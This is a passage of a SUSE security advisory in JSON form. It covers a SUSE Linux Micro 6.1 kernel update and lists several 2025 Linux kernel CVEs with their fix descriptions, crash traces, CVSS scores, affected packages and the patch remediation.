"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2025-71120"
},
{
"cve": "CVE-2025-71123",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71123"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: fix string copying in parse_apply_sb_mount_options()\n\nstrscpy_pad() can\u0027t be used to copy a non-NUL-term string into a NUL-term\nstring of possibly bigger size. Commit 0efc5990bca5 (\"string.h: Introduce\nmemtostr() and memtostr_pad()\") provides additional information in that\nregard. So if this happens, the following warning is observed:\n\nstrnlen: detected buffer overflow: 65 byte read of buffer size 64\nWARNING: CPU: 0 PID: 28655 at lib/string_helpers.c:1032 __fortify_report+0x96/0xc0 lib/string_helpers.c:1032\nModules linked in:\nCPU: 0 UID: 0 PID: 28655 Comm: syz-executor.3 Not tainted 6.12.54-syzkaller-00144-g5f0270f1ba00 #0\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\nRIP: 0010:__fortify_report+0x96/0xc0 lib/string_helpers.c:1032\nCall Trace:\n \u003cTASK\u003e\n __fortify_panic+0x1f/0x30 lib/string_helpers.c:1039\n strnlen include/linux/fortify-string.h:235 [inline]\n sized_strscpy include/linux/fortify-string.h:309 [inline]\n parse_apply_sb_mount_options fs/ext4/super.c:2504 [inline]\n __ext4_fill_super fs/ext4/super.c:5261 [inline]\n ext4_fill_super+0x3c35/0xad00 fs/ext4/super.c:5706\n get_tree_bdev_flags+0x387/0x620 fs/super.c:1636\n vfs_get_tree+0x93/0x380 fs/super.c:1814\n do_new_mount fs/namespace.c:3553 [inline]\n path_mount+0x6ae/0x1f70 fs/namespace.c:3880\n do_mount fs/namespace.c:3893 [inline]\n __do_sys_mount fs/namespace.c:4103 [inline]\n __se_sys_mount fs/namespace.c:4080 [inline]\n __x64_sys_mount+0x280/0x300 fs/namespace.c:4080\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0x64/0x140 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nSince userspace is expected to provide s_mount_opts field to be at most 63\ncharacters long with the ending byte being NUL-term, use a 64-byte buffer\nwhich matches the size of s_mount_opts, so that strscpy_pad() does its job\nproperly. Return with error if the user still managed to provide a\nnon-NUL-term string here.\n\nFound by Linux Verification Center (linuxtesting.org) with Syzkaller.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71123",
"url": "https://www.suse.com/security/cve/CVE-2025-71123"
},
{
"category": "external",
"summary": "SUSE Bug 1256757 for CVE-2025-71123",
"url": "https://bugzilla.suse.com/1256757"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71123"
},
{
"cve": "CVE-2025-71130",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71130"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/i915/gem: Zero-initialize the eb.vma array in i915_gem_do_execbuffer\n\nInitialize the eb.vma array with values of 0 when the eb structure is\nfirst set up. In particular, this sets the eb-\u003evma[i].vma pointers to\nNULL, simplifying cleanup and getting rid of the bug described below.\n\nDuring the execution of eb_lookup_vmas(), the eb-\u003evma array is\nsuccessively filled up with struct eb_vma objects. This process includes\ncalling eb_add_vma(), which might fail; however, even in the event of\nfailure, eb-\u003evma[i].vma is set for the currently processed buffer.\n\nIf eb_add_vma() fails, eb_lookup_vmas() returns with an error, which\nprompts a call to eb_release_vmas() to clean up the mess. Since\neb_lookup_vmas() might fail during processing any (possibly not first)\nbuffer, eb_release_vmas() checks whether a buffer\u0027s vma is NULL to know\nat what point did the lookup function fail.\n\nIn eb_lookup_vmas(), eb-\u003evma[i].vma is set to NULL if either the helper\nfunction eb_lookup_vma() or eb_validate_vma() fails. eb-\u003evma[i+1].vma is\nset to NULL in case i915_gem_object_userptr_submit_init() fails; the\ncurrent one needs to be cleaned up by eb_release_vmas() at this point,\nso the next one is set. If eb_add_vma() fails, neither the current nor\nthe next vma is set to NULL, which is a source of a NULL deref bug\ndescribed in the issue linked in the Closes tag.\n\nWhen entering eb_lookup_vmas(), the vma pointers are set to the slab\npoison value, instead of NULL. This doesn\u0027t matter for the actual\nlookup, since it gets overwritten anyway, however the eb_release_vmas()\nfunction only recognizes NULL as the stopping value, hence the pointers\nare being set to NULL as they go in case of intermediate failure. This\npatch changes the approach to filling them all with NULL at the start\ninstead, rather than handling that manually during failure.\n\n(cherry picked from commit 08889b706d4f0b8d2352b7ca29c2d8df4d0787cd)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71130",
"url": "https://www.suse.com/security/cve/CVE-2025-71130"
},
{
"category": "external",
"summary": "SUSE Bug 1256741 for CVE-2025-71130",
"url": "https://bugzilla.suse.com/1256741"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71130"
},
{
"cve": "CVE-2025-71131",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71131"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: seqiv - Do not use req-\u003eiv after crypto_aead_encrypt\n\nAs soon as crypto_aead_encrypt is called, the underlying request\nmay be freed by an asynchronous completion. Thus dereferencing\nreq-\u003eiv after it returns is invalid.\n\nInstead of checking req-\u003eiv against info, create a new variable\nunaligned_info and use it for that purpose instead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71131",
"url": "https://www.suse.com/security/cve/CVE-2025-71131"
},
{
"category": "external",
"summary": "SUSE Bug 1256742 for CVE-2025-71131",
"url": "https://bugzilla.suse.com/1256742"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71131"
},
{
"cve": "CVE-2025-71132",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71132"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmc91x: fix broken irq-context in PREEMPT_RT\n\nWhen smc91x.c is built with PREEMPT_RT, the following splat occurs\nin FVP_RevC:\n\n[ 13.055000] smc91x LNRO0003:00 eth0: link up, 10Mbps, half-duplex, lpa 0x0000\n[ 13.062137] BUG: workqueue leaked atomic, lock or RCU: kworker/2:1[106]\n[ 13.062137] preempt=0x00000000 lock=0-\u003e0 RCU=0-\u003e1 workfn=mld_ifc_work\n[ 13.062266] C\n** replaying previous printk message **\n[ 13.062266] CPU: 2 UID: 0 PID: 106 Comm: kworker/2:1 Not tainted 6.18.0-dirty #179 PREEMPT_{RT,(full)}\n[ 13.062353] Hardware name: , BIOS\n[ 13.062382] Workqueue: mld mld_ifc_work\n[ 13.062469] Call trace:\n[ 13.062494] show_stack+0x24/0x40 (C)\n[ 13.062602] __dump_stack+0x28/0x48\n[ 13.062710] dump_stack_lvl+0x7c/0xb0\n[ 13.062818] dump_stack+0x18/0x34\n[ 13.062926] process_scheduled_works+0x294/0x450\n[ 13.063043] worker_thread+0x260/0x3d8\n[ 13.063124] kthread+0x1c4/0x228\n[ 13.063235] ret_from_fork+0x10/0x20\n\nThis happens because smc_special_trylock() disables IRQs even on PREEMPT_RT,\nbut smc_special_unlock() does not restore IRQs on PREEMPT_RT.\nThe reason is that smc_special_unlock() calls spin_unlock_irqrestore(),\nand rcu_read_unlock_bh() in __dev_queue_xmit() cannot invoke\nrcu_read_unlock() through __local_bh_enable_ip() when current-\u003esoftirq_disable_cnt becomes zero.\n\nTo address this issue, replace smc_special_trylock() with spin_trylock_irqsave().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71132",
"url": "https://www.suse.com/security/cve/CVE-2025-71132"
},
{
"category": "external",
"summary": "SUSE Bug 1256737 for CVE-2025-71132",
"url": "https://bugzilla.suse.com/1256737"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71132"
},
{
"cve": "CVE-2025-71133",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71133"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/irdma: avoid invalid read in irdma_net_event\n\nirdma_net_event() should not dereference anything from \"neigh\" (alias\n\"ptr\") until it has checked that the event is NETEVENT_NEIGH_UPDATE.\nOther events come with different structures pointed to by \"ptr\" and they\nmay be smaller than struct neighbour.\n\nMove the read of neigh-\u003edev under the NETEVENT_NEIGH_UPDATE case.\n\nThe bug is mostly harmless, but it triggers KASAN on debug kernels:\n\n BUG: KASAN: stack-out-of-bounds in irdma_net_event+0x32e/0x3b0 [irdma]\n Read of size 8 at addr ffffc900075e07f0 by task kworker/27:2/542554\n\n CPU: 27 PID: 542554 Comm: kworker/27:2 Kdump: loaded Not tainted 5.14.0-630.el9.x86_64+debug #1\n Hardware name: [...]\n Workqueue: events rt6_probe_deferred\n Call Trace:\n \u003cIRQ\u003e\n dump_stack_lvl+0x60/0xb0\n print_address_description.constprop.0+0x2c/0x3f0\n print_report+0xb4/0x270\n kasan_report+0x92/0xc0\n irdma_net_event+0x32e/0x3b0 